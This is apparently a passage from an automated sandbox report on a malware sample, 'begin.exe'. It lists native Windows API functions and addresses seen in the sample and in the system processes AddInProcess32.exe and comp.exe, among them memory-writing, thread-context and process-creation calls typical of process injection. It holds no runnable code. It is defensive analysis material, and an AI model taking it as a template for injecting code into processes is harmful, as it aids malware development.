Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01174650 NtSuspendThread,	11_2_01174650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01172B80 NtQueryInformationFile,	11_2_01172B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01172BA0 NtEnumerateValueKey,	11_2_01172BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01172BF0 NtAllocateVirtualMemory,	11_2_01172BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01172BE0 NtQueryValueKey,	11_2_01172BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01172AB0 NtWaitForSingleObject,	11_2_01172AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01172AD0 NtReadFile,	11_2_01172AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01172AF0 NtWriteFile,	11_2_01172AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01172D10 NtMapViewOfSection,	11_2_01172D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01172D00 NtSetInformationFile,	11_2_01172D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01172D30 NtUnmapViewOfSection,	11_2_01172D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01172DB0 NtEnumerateKey,	11_2_01172DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01172DD0 NtDelayExecution,	11_2_01172DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01172C00 NtQueryInformationProcess,	11_2_01172C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01172C60 NtCreateKey,	11_2_01172C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01172CA0 NtQueryInformationToken,	11_2_01172CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01172CC0 NtQueryVirtualMemory,	11_2_01172CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01172CF0 NtOpenProcess,	11_2_01172CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01172F30 NtCreateSection,	11_2_01172F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01172F60 NtCreateProcessEx,	11_2_01172F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01172F90 NtProtectVirtualMemory,	11_2_01172F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01172FB0 NtResumeThread,	11_2_01172FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01172FA0 NtQuerySection,	11_2_01172FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01172FE0 NtCreateFile,	11_2_01172FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01172E30 NtWriteVirtualMemory,	11_2_01172E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01172E80 NtReadVirtualMemory,	11_2_01172E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01172EA0 NtAdjustPrivilegesToken,	11_2_01172EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01172EE0 NtQueueApcThread,	11_2_01172EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01173010 NtOpenDirectoryObject,	11_2_01173010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01173090 NtSetValueKey,	11_2_01173090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_011739B0 NtGetContextThread,	11_2_011739B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01173D10 NtOpenProcessToken,	11_2_01173D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01173D70 NtOpenThread,	11_2_01173D70
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_03924340 NtSetContextThread,LdrInitializeThunk,	14_2_03924340
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_03924650 NtSuspendThread,LdrInitializeThunk,	14_2_03924650
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_03922BA0 NtEnumerateValueKey,LdrInitializeThunk,	14_2_03922BA0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_03922BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	14_2_03922BF0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_03922BE0 NtQueryValueKey,LdrInitializeThunk,	14_2_03922BE0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_03922B60 NtClose,LdrInitializeThunk,	14_2_03922B60
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_03922AD0 NtReadFile,LdrInitializeThunk,	14_2_03922AD0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_03922AF0 NtWriteFile,LdrInitializeThunk,	14_2_03922AF0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_03922FB0 NtResumeThread,LdrInitializeThunk,	14_2_03922FB0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_03922FE0 NtCreateFile,LdrInitializeThunk,	14_2_03922FE0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_03922F30 NtCreateSection,LdrInitializeThunk,	14_2_03922F30
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_03922E80 NtReadVirtualMemory,LdrInitializeThunk,	14_2_03922E80
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_03922EE0 NtQueueApcThread,LdrInitializeThunk,	14_2_03922EE0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_03922DD0 NtDelayExecution,LdrInitializeThunk,	14_2_03922DD0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_03922DF0 NtQuerySystemInformation,LdrInitializeThunk,	14_2_03922DF0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_03922D10 NtMapViewOfSection,LdrInitializeThunk,	14_2_03922D10
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_03922D30 NtUnmapViewOfSection,LdrInitializeThunk,	14_2_03922D30
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_03922CA0 NtQueryInformationToken,LdrInitializeThunk,	14_2_03922CA0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_03922C70 NtFreeVirtualMemory,LdrInitializeThunk,	14_2_03922C70
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_03922C60 NtCreateKey,LdrInitializeThunk,	14_2_03922C60
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_039235C0 NtCreateMutant,LdrInitializeThunk,	14_2_039235C0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_039239B0 NtGetContextThread,LdrInitializeThunk,	14_2_039239B0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_03922B80 NtQueryInformationFile,	14_2_03922B80
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_03922AB0 NtWaitForSingleObject,	14_2_03922AB0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_03922F90 NtProtectVirtualMemory,	14_2_03922F90
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_03922FA0 NtQuerySection,	14_2_03922FA0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_03922F60 NtCreateProcessEx,	14_2_03922F60
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_03922EA0 NtAdjustPrivilegesToken,	14_2_03922EA0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_03922E30 NtWriteVirtualMemory,	14_2_03922E30
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_03922DB0 NtEnumerateKey,	14_2_03922DB0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_03922D00 NtSetInformationFile,	14_2_03922D00
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_03922CC0 NtQueryVirtualMemory,	14_2_03922CC0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_03922CF0 NtOpenProcess,	14_2_03922CF0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_03922C00 NtQueryInformationProcess,	14_2_03922C00
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_03923090 NtSetValueKey,	14_2_03923090
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_03923010 NtOpenDirectoryObject,	14_2_03923010
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_03923D10 NtOpenProcessToken,	14_2_03923D10
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_03923D70 NtOpenThread,	14_2_03923D70
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_030C9300 NtReadFile,	14_2_030C9300
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_030C93F0 NtDeleteFile,	14_2_030C93F0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_030C9190 NtCreateFile,	14_2_030C9190
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_030C9600 NtAllocateVirtualMemory,	14_2_030C9600
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_030C9490 NtClose,	14_2_030C9490

Source: C:\Users\user\Desktop\begin.exe

Code function: 0_2_0DD74F18 CreateProcessAsUserW,

0_2_0DD74F18

Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_02C82AFF	0_2_02C82AFF
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_02C8E930	0_2_02C8E930
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_02C89008	0_2_02C89008
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_02C831B0	0_2_02C831B0
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_02C8E920	0_2_02C8E920
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_02C88FF9	0_2_02C88FF9
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_02C8DDA8	0_2_02C8DDA8
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_061A2D78	0_2_061A2D78
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_061AE610	0_2_061AE610
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_061AE620	0_2_061AE620
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_061A2D6A	0_2_061A2D6A
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_061ABC64	0_2_061ABC64
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_066FF688	0_2_066FF688
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_066F3DF8	0_2_066F3DF8
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_066FDE50	0_2_066FDE50
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_066F3DEA	0_2_066F3DEA
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_06725FC0	0_2_06725FC0
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_06723C18	0_2_06723C18
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_06728D28	0_2_06728D28
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_06725A60	0_2_06725A60
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_06728777	0_2_06728777
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_06728778	0_2_06728778
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_0672874B	0_2_0672874B
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_06725FB1	0_2_06725FB1
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_06723C08	0_2_06723C08
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_06728D19	0_2_06728D19
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_0672F018	0_2_0672F018
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_0672F008	0_2_0672F008
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_082A4020	0_2_082A4020
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_082AA4D1	0_2_082AA4D1
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_082A5D28	0_2_082A5D28
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_082A5108	0_2_082A5108
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_082A65A1	0_2_082A65A1
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_082A7E18	0_2_082A7E18
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_082A1AA0	0_2_082A1AA0
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_082A0A88	0_2_082A0A88
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_082AF738	0_2_082AF738
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_082A6F69	0_2_082A6F69
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_082A5C70	0_2_082A5C70
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_082AA0B1	0_2_082AA0B1
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_082AB08F	0_2_082AB08F
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_082AEC80	0_2_082AEC80
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_082A8CF0	0_2_082A8CF0
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_082AA0C0	0_2_082AA0C0
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_082A5CDD	0_2_082A5CDD
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_082A7D3A	0_2_082A7D3A
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_082A8D00	0_2_082A8D00
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_082A19EF	0_2_082A19EF
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_082A0A78	0_2_082A0A78
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_082A9E78	0_2_082A9E78
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_082A1A50	0_2_082A1A50
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_082A9E88	0_2_082A9E88
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_082A9AD0	0_2_082A9AD0
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_082AA328	0_2_082AA328
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_082AA338	0_2_082AA338
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_082A97E0	0_2_082A97E0
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_082A97D0	0_2_082A97D0
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_0DD73DD8	0_2_0DD73DD8
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_0DD75580	0_2_0DD75580
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_0DD75887	0_2_0DD75887
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_0DD70040	0_2_0DD70040
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_0DD793F0	0_2_0DD793F0
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_0DD7ADA0	0_2_0DD7ADA0
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_0DD75570	0_2_0DD75570
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_0DD71D30	0_2_0DD71D30
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_0DD737D8	0_2_0DD737D8
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_0DD737C9	0_2_0DD737C9
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_0DD75F12	0_2_0DD75F12
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_0DD73070	0_2_0DD73070
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_0DD73060	0_2_0DD73060
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_0DD7003F	0_2_0DD7003F
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_0DD7324F	0_2_0DD7324F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_00418773	11_2_00418773
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_00403060	11_2_00403060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_00416973	11_2_00416973
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_0041692C	11_2_0041692C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_0040E180	11_2_0040E180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_00410183	11_2_00410183
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_0040E183	11_2_0040E183
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_0040E2C8	11_2_0040E2C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_0040E2D3	11_2_0040E2D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_004022F2	11_2_004022F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_00402300	11_2_00402300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_00402BB0	11_2_00402BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_004024B0	11_2_004024B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_0042ED83	11_2_0042ED83
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_0040FF5A	11_2_0040FF5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_0040FF63	11_2_0040FF63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_00402780	11_2_00402780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_011DA118	11_2_011DA118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01130100	11_2_01130100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_011C8158	11_2_011C8158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_012001AA	11_2_012001AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_011F41A2	11_2_011F41A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_011F81CC	11_2_011F81CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_011D2000	11_2_011D2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_011FA352	11_2_011FA352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_012003E6	11_2_012003E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_0114E3F0	11_2_0114E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_011E0274	11_2_011E0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_011C02C0	11_2_011C02C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01140535	11_2_01140535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01200591	11_2_01200591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_011E4420	11_2_011E4420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_011F2446	11_2_011F2446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_011EE4F6	11_2_011EE4F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01164750	11_2_01164750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01140770	11_2_01140770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_0113C7C0	11_2_0113C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_0115C6E0	11_2_0115C6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01156962	11_2_01156962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_0120A9A6	11_2_0120A9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_011429A0	11_2_011429A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_0114A840	11_2_0114A840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01142840	11_2_01142840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_011268B8	11_2_011268B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_0116E8F0	11_2_0116E8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_011FAB40	11_2_011FAB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_011F6BD7	11_2_011F6BD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_0113EA80	11_2_0113EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_011DCD1F	11_2_011DCD1F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_0114AD00	11_2_0114AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01158DBF	11_2_01158DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_0113ADE0	11_2_0113ADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01140C00	11_2_01140C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_011E0CB5	11_2_011E0CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01130CF2	11_2_01130CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01160F30	11_2_01160F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_011E2F30	11_2_011E2F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01182F28	11_2_01182F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_011B4F40	11_2_011B4F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_011BEFA0	11_2_011BEFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01132FC8	11_2_01132FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_0114CFE0	11_2_0114CFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_011FEE26	11_2_011FEE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01140E59	11_2_01140E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01152E90	11_2_01152E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_011FCE93	11_2_011FCE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_011FEEDB	11_2_011FEEDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_0120B16B	11_2_0120B16B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_0112F172	11_2_0112F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_0117516C	11_2_0117516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_0114B1B0	11_2_0114B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_011EF0CC	11_2_011EF0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_011470C0	11_2_011470C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_011F70E9	11_2_011F70E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_011FF0E0	11_2_011FF0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_011F132D	11_2_011F132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_0112D34C	11_2_0112D34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_0118739A	11_2_0118739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_011452A0	11_2_011452A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_0115B2C0	11_2_0115B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_011E12ED	11_2_011E12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_011F7571	11_2_011F7571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_011DD5B0	11_2_011DD5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_012095C3	11_2_012095C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_011FF43F	11_2_011FF43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01131460	11_2_01131460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_011FF7B0	11_2_011FF7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01185630	11_2_01185630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_011F16CC	11_2_011F16CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_011D5910	11_2_011D5910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01149950	11_2_01149950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_0115B950	11_2_0115B950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_011AD800	11_2_011AD800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_011438E0	11_2_011438E0
